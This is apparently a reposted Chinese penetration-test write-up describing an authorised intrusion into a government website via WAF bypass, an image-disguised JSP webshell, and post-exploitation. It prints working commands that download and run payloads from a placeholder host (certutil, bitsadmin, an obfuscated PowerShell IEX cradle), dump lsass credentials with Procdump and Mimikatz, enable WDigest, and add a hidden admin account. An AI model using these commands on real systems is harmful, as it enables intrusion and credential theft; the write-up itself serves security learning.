内容简介:很久没有整理实战文章了,恰好这周项目上有一个目标折腾了两天时间,记录分享下其中的心路历程(本次渗透过程均在目标授权下进行,请勿进行非法渗透行为)。某政务网站服务器–windows
前言
很久没有整理实战文章了,恰好这周项目上有一个目标折腾了两天时间,记录分享下其中的心路历程(本次渗透过程均在目标授权下进行,请勿进行非法渗透行为)。
目标基本信息
某政务网站
服务器–windows
数据库–未知
中间件–Tomcat
开发语言–java
未使用CDN
存在waf–种类未知
Getshell过程
其它漏洞的挖掘过程不再描述,直奔权限,发现目标存在一处上传功能。
上传成功后返回取件码。
使用取件码进行信件查询。
点击附件为下载链接。
通过对下载链接进行测试,发现报错时泄漏了网站的绝对路径。
进过几次尝试,成功访问到上传的图片。
网站waf对上传文件的后缀名进行了白名单限制。
根据以往的bypass经验,开始手撕waf。
后缀名校验绕过
寻找waf的设计缺陷来绕过waf的上传限制,
常用的几种方法有:
删除实体里面的Conten-Type字段
删除Content-Disposition字段里的空格
修改Content-Disposition字段值的大小写
文件名处回车
等等等等。
总结一下思路就是在不影响正常上传功能的前提下,尝试改变数据包的部分格式内容,绕过waf的校验。
经过多次尝试,当Content-Disposition字段修改为Content+Disposition时可以绕过waf,可以看到上传功能的代码未对后缀名做限制,存在任意文件上传漏洞。
内容校验绕过
成功对文件后缀名进行了绕过。
直接上传免杀还可以的冰蝎马。
上传失败,再次被waf拦截,发现还存在文件内容校验,尝试使用平时积累的免杀马。
经过尝试免杀马全部阵亡,无一例外。
当使用 java 的输出函数时也会被waf检测拦截。
第一次碰到连输出helloword都拦的waf。
经过多次测试,waf对绝大部分的java函数都进行了拦截。
内容加密
这种情况下,首先想到的解决方案是对木马进行加密。
在网上查找相关的资料,发现了LandGrey大佬的一个unicode编码的菜刀马。 传送门
可以上传成功。
必须要使用caidao-20160622的版本进行连接(默认分隔符: X@Y),然而。
菜刀流量被waf拦截了。
想到了2种解决方案。
1、使用内容加密的大马,例如下图的 php 大马的这种加解密。
2、菜刀马流量中转,上传中转菜刀马,配合本地加解密脚本文件,对数据进行中转加密传输。
奈何网上关于jsp加密大马和jsp中转木马研究的文章数量有限,再加上本人不懂java开发,最后以失败告终。
在这个学习尝试的过程看到了不少大佬优秀的文章,学习到了很多相关知识。如:
CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF
感兴趣的小伙伴可以研究下。
内容混淆
内容加密bypass失败了,只能换一个思路。
尝试对文件内容进行混淆,绕过waf。
首先想到的是图片马,尝试把木马隐藏到图片源码中,绕过waf。
在这个过程中也踩了一些坑,有些图片源码包含特殊字符会和木马的代码发生冲突,因此需要特殊处理过的图片才能保证正常解析。
使用notepad++打开准备好的图片,把jsp马插入到图片源码中。
更改为jsp后缀进行上传。
上传失败,猜测可能是混淆的力度不够,未起到混淆的目的。
开始增加文件内容的长度,复制图片的一段源码,反复的粘贴到木马的前后位置,经过若干次尝试,返回了上传成功,且只能成功一次,下
次上传需要重新混淆,难道waf还自带了机器学习?
访问webshell地址,文件解析成功,成功拿下了目标的webshell,权限为最高的administrator权限。
上传的为CMD马,只能执行系统命令,目标通互联网,下一步的思路是:使用命令直接下载cs马或者msf马执行。
使用命令下载免杀exe到本地执行。
cmd下常用的下载命令有三种,推荐使用证书下载命令,免杀性强,其它两种容易被防护拦截。
证书下载
证书下载
certutil.exe -urlcache -split -f http://x.x.x.x/1.exe D:/1.exe
vbs下载
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
cscript downfile.vbs http://x.x.x.x/1.exe D:\\1.ex
bitsadmin命令下载
bitsadmin /transfer n http://x.x.x.x/1.exe D:\\1.exe
在可以调用powershell的情况下,推荐使用powershell对木马文件进行下载执行,优点是免杀可操作性强,无落地文件。
这里给出我之前发布的免杀powershell命令
powershell.exe "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''<a href="http://x.x.x.x">http://x.x.x.x</a>''))';$a3="$a1,$a2";IEX(-join $a3)"
免杀处理的方法有很多,可以参考我之前发布的文章中。 攻防演练对抗赛之初识文件钓鱼
也可以关注我们Tide安全团队的公众号,查看免杀系列文章。
上传后成功执行,cs成功接收到会话信息。
尝试激活guest用户,加入管理员组失败。
存在服务器防护需要绕过。
服务器为server 2008,默认情况下,可以使用Procdump+Mimikatz来读取管理员的明文密码。
Procdump由微软官方提供,绝大多数情况下不会被杀。
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
分为2步:
1、导出lsass.exe进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2、使用mimikatz破解导出的文件lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
需要上传procdump64.exe生成lsass.dmp文件,下载后本地读取密码。
对于server 2012以上,或者打了补丁的操作系统,无法直接读取明文,必须修改注册表,重启服务器等待管理员登录才能获取到明文密码。
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
还可以选择执行powershell命令添加用户。
使用Get-ExecutionPolicy 查看当前执行策略为Restricted(默认策略,不允许任意脚本的执行)
使用Set-ExecutionPolicy 设置执行的策略为RemoteSigned (本地脚本无限制,但是对来自网络的脚本必须经过签名)
相关powershell命令可查看CSeroad大佬的文章。 传送门
powershell的免杀性强,大多数情况下都可以执行成功。
上传添加用户的ps1文件到服务器中,调用powershell执行,此方法可以绕过大部分杀软,达到免杀加用户到管理员组的目的。
powershell 1.ps1
$computer=Get-WMIObject Win32_ComputerSystem $computername = $computer.name $username = 'admin' $password = '1234qwer..' $desc = 'Local admin account' $computer = [ADSI]"WinNT://$computername,computer" $user = $computer.Create("user", $username) $user.SetPassword($password) $user.Setinfo() $user.description = $desc $user.setinfo() $user.UserFlags = 65536 $user.SetInfo() $group = [ADSI]("WinNT://$computername/administrators,group") $group.add("WinNT://$username,user")
添加用户成功后。
使用cs自带的socks4隧道。
本机配置Proxifer。
成功把本机带入目标内网。
打开远程桌面功能,输入对方的内网ip和远程桌面端口,输入用户名密码。
登录成功,目标安装了服务器安全狗和企业版金山毒霸,到此渗透结束。
总结
由于不懂java开发,导致前期的getshell耽误了过长时间,未解决的问题,后面还需要再学习。
渗透过程中走了很多弯路,但也学习到了很多新的知识。
*本文原创作者:诺言,本文属于FreeBuf原创奖励计划,未经许可禁止转载
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 靶机渗透之Raven实战
- 靶机渗透之Typhoon实战
- HTB靶机渗透实战——Carrier
- 渗透技巧之Powershell实战技巧
- 渗透测试实战-bulldog 2靶机入侵
- 渗透测试实战-Raven:1靶机入侵
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
网络营销实战密码
昝辉Zac / 电子工业出版社 / 2009.1 / 56.00元
本书是作者几年来网络营销实战的总结,与其他网络营销书籍最大不同之处是:只专注于实战,不谈理论。本书分三部分详细介绍了网络营销实用策略和技巧,并分析了大量实战案例。第一部分介绍市场与产品研究,包括用户、市场和竞争对手的调查;产品、目标市场的确定;价格策略;赢利模式等。第二部分讨论以网络营销为导向的网站设计,包括怎样在网站上卖东西、提高转化率,以及网站目标设定等。第三部分研究怎样给网站带来流量,详细讨......一起来看看 《网络营销实战密码》 这本书的介绍吧!